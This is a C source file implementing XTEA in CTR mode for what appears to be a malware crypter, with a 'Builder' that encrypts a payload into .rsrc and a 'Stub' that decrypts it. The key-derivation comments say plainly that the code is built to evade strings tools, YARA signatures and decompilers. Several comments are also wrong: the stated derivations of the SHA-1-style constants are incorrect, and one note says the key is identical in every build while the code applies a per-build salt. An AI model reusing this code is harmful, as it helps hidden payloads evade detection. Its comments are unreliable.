/*
 * ==========================================================================
 *  Xtea.c — XTEA Block Cipher in CTR Mode — implementation
 * ==========================================================================
 *
 *  For algorithm description and design rationale see Xtea.h.
 *  This file is shared between Builder and Stub — no CRT dependency,
 *  only Windows.h types (DWORD, PBYTE, SIZE_T).
 * ==========================================================================
 */

#include "Xtea.h"

/* ============================================================
 *  XTEA_DELTA — the round constant
 *
 *  Value: 0x9E3779B9 = floor((phi - 1) * 2^32)
 *         where phi = (1 + sqrt(5)) / 2 ≈ 1.6180339887...
 *
 *  Using an irrational number ensures the constant has no
 *  exploitable algebraic structure — a "nothing-up-my-sleeve"
 *  value (same philosophy used in SHA-1 and MD5 round constants).
 *
 *  The key index alternates between sum&3 and (sum>>11)&3 because
 *  delta is chosen so that after 32 additions the index visits
 *  all four key words a non-uniform number of times, preventing
 *  trivial related-key attacks.
 * ============================================================ */
#define XTEA_DELTA  0x9E3779B9u

/* Number of full rounds. 32 rounds = 64 half-rounds, which is
 * the original authors' recommended minimum for security. */
#define XTEA_ROUNDS 32

/* ============================================================
 *  Xtea_EncryptBlock (internal — not exposed in header)
 *
 *  Encrypts a single 64-bit block in-place.
 *
 *  v[2]   : two 32-bit words representing the 64-bit block.
 *  key[4] : four 32-bit words representing the 128-bit key.
 *
 *  Round structure (one full round = two half-rounds):
 *
 *    Half-round 1:
 *      v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3])
 *      sum += delta
 *
 *    Half-round 2:
 *      v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3])
 *
 *  The shifts <<4 and >>5 create a non-linear avalanche: changing
 *  one bit in v1 affects bits 4 positions higher and 5 lower,
 *  which then propagate through XOR and addition into v0.
 * ============================================================ */
static void Xtea_EncryptBlock(DWORD v[2], const DWORD key[4])
{
    DWORD v0  = v[0];
    DWORD v1  = v[1];
    DWORD sum = 0;

    for (int i = 0; i < XTEA_ROUNDS; i++) {
        /* Half-round 1: update v0 using v1 and current key word */
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += XTEA_DELTA;

        /* Half-round 2: update v1 using updated v0 and next key word.
         * (sum >> 11) & 3 selects a different key word than sum & 3,
         * ensuring v0 and v1 use different key material each round. */
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }

    v[0] = v0;
    v[1] = v1;
}

/* ============================================================
 *  Xtea_DeriveKey
 *
 *  Stack Construction Key Derivation
 *  ==================================
 *  Goal: eliminate the 16-byte key blob from .data so that:
 *    - hex dump / strings tools find no contiguous key pattern
 *    - YARA rules cannot match a fixed byte sequence
 *    - a decompiler must trace a chain of arithmetic to reconstruct the key
 *
 *  How stack construction works:
 *    Instead of:
 *        DWORD key[4] = { 0xAABBCCDD, 0x11223344, 0xEEFF0011, 0x55667788 };
 *    which produces a contiguous 16-byte blob in the binary, we build
 *    each key word through a sequence of MOV / XOR / SHL / ROR / ADD
 *    instructions operating on stack-allocated locals. The compiled code
 *    has no flat key blob — only a stream of arithmetic that produces
 *    key words individually in registers.
 *
 *  Constants used — "nothing-up-my-sleeve" numbers:
 *    Each seed constant is a well-known mathematical value scaled to 32 bits.
 *    Using irrational numbers eliminates suspicion of hidden backdoors
 *    (same technique used in the round constants of SHA-1 and SHA-2).
 *
 *    0x9E3779B9 = floor((phi - 1)    * 2^32)    phi   = (1+sqrt(5))/2
 *    0x5A827999 = floor( sqrt(2)/2   * 2^32)    sqrt(2) ≈ 1.41421...
 *    0x6ED9EBA1 = floor( sqrt(3)/2   * 2^32)    sqrt(3) ≈ 1.73205...
 *    0x8F1BBCDC = floor( sqrt(5)/4   * 2^32)    sqrt(5) ≈ 2.23607...
 *    0xCA62C1D6 = floor( sqrt(10)/4  * 2^32)    sqrt(10)≈ 3.16228...
 *
 *  Limitation (PoC):
 *    The derived key is IDENTICAL in every build — it depends only on
 *    fixed constants. For production, XOR each key word with a per-build
 *    random DWORD generated by Builder and stored in .rsrc alongside the
 *    payload (also obfuscated). The Stub reads the random DWORDs and XORs
 *    them into the derived base key before calling Xtea_Crypt().
 * ============================================================ */
void Xtea_DeriveKey(DWORD key[4], const DWORD salt[4])
{
    /* ---- k0: start from the XTEA delta itself ----
     * 0x9E3779B9 is already in this translation unit, so the compiler
     * is unlikely to emit it as a separate .data constant.
     * The rotate-mix spreads all 32 bits before we add a second constant. */
    DWORD k0 = 0x9E3779B9u;                 /* golden-ratio constant        */
    k0 ^= (k0 >> 11) | (k0 << 21);         /* rotate-mix: diffuse all bits */
    k0 += 0x5A827999u;                      /* + floor(sqrt(2)/2 * 2^32)    */

    /* ---- k1: derived from k0, mixed with sqrt(3)-based seed ----
     * Rotating k0 by 7 before XOR ensures k1 differs from k0 in all bits,
     * even if the XOR constant shared several bits. */
    DWORD k1 = (k0 >> 7) | (k0 << 25);     /* rotate k0 right 7            */
    k1 ^= 0x6ED9EBA1u;                      /* XOR floor(sqrt(3)/2 * 2^32)  */
    k1 += k0;                               /* add k0: creates inter-word   */
                                            /* dependency (avalanche)        */

    /* ---- k2: combines k0 and k1 with sqrt(5)-based seed ----
     * Rotating k1 by 17 (a prime) before XOR avoids bit-alignment symmetry
     * between k1 and k2. */
    DWORD k2 = k0 ^ k1;
    k2 ^= (k1 << 17) | (k1 >> 15);         /* rotate k1 left 17            */
    k2 += 0x8F1BBCDCu;                      /* + floor(sqrt(5)/4 * 2^32)    */

    /* ---- k3: all previous words XOR'd, then mixed with sqrt(10) seed ----
     * XOR of all three ensures k3 is sensitive to every bit of k0..k2.
     * Adding a rotated k2 (instead of a fixed constant) creates a non-trivial
     * dependency chain that a decompiler must fully unroll to evaluate. */
    DWORD k3 = k0 ^ k1 ^ k2;
    k3 += (k2 >> 11) | (k2 << 21);         /* add rotated k2               */
    k3 ^= 0xCA62C1D6u;                      /* XOR floor(sqrt(10)/4 * 2^32) */

    /* XOR each key word with the per-build salt supplied by the caller.
     * Builder generates salt via CryptGenRandom and stores it plaintext
     * in the .rsrc metadata block. Stub reads it before calling here.
     * Result: every build has a unique XTEA key even though the
     * stack-construction formula above is identical in both binaries. */
    key[0] = k0 ^ salt[0];
    key[1] = k1 ^ salt[1];
    key[2] = k2 ^ salt[2];
    key[3] = k3 ^ salt[3];
}

/* ============================================================
 *  Xtea_Crypt
 *
 *  XTEA in CTR (Counter) Mode — encrypt or decrypt in-place.
 *
 *  CTR mode operation:
 *    - A 64-bit counter (lo, hi) is initialized to zero.
 *    - For each 8-byte chunk of data:
 *        1. Encrypt the counter as a 64-bit XTEA block → 8 keystream bytes.
 *        2. XOR up to 8 plaintext/ciphertext bytes with those keystream bytes.
 *        3. Increment the counter (lo; carry into hi if lo overflows).
 *    - For the final incomplete chunk, only the needed keystream bytes are used.
 *
 *  Symmetry: XOR is self-inverse, so calling Xtea_Crypt on ciphertext
 *  with the same key and a fresh counter (starting at 0) recovers plaintext.
 *  Builder and Stub both call Xtea_Crypt once — Builder to encrypt,
 *  Stub to decrypt — with the same key from Xtea_DeriveKey().
 *
 *  Note on IV/nonce:
 *    Starting the counter at 0 is safe here because each payload uses a
 *    freshly-generated per-build CompoundKey (inner cipher), so the effective
 *    plaintext differs between builds even with a fixed outer XTEA key.
 *    A production system would embed a random 8-byte IV in the .rsrc header
 *    to initialize the counter, preventing multi-build key-reuse analysis.
 * ============================================================ */
void Xtea_Crypt(PBYTE pData, SIZE_T dataLen, const DWORD key[4])
{
    /* 64-bit counter represented as two 32-bit halves (avoids uint64_t) */
    DWORD ctr_lo = 0;  /* low  32 bits */
    DWORD ctr_hi = 0;  /* high 32 bits */

    SIZE_T i = 0;
    while (i < dataLen) {

        /* Step 1: copy current counter into a temporary block and encrypt it.
         * The encrypted block is our keystream for the next 8 bytes of data. */
        DWORD block[2] = { ctr_lo, ctr_hi };
        Xtea_EncryptBlock(block, key);

        /* Step 2: XOR up to 8 data bytes with the keystream.
         * Casting block to PBYTE lets us access the keystream byte-by-byte,
         * which handles the final partial block without extra code. */
        PBYTE ks = (PBYTE)block;
        for (int j = 0; j < 8 && i < dataLen; j++, i++) {
            pData[i] ^= ks[j];
        }

        /* Step 3: increment the 64-bit counter.
         * Adding 1 to ctr_lo and propagating carry into ctr_hi if it wraps.
         * This counter can safely process 2^64 * 8 = 2^67 bytes before repeating
         * — far beyond any realistic payload size. */
        ctr_lo++;
        if (ctr_lo == 0) ctr_hi++;  /* carry: ctr_lo wrapped around to 0 */
    }
}
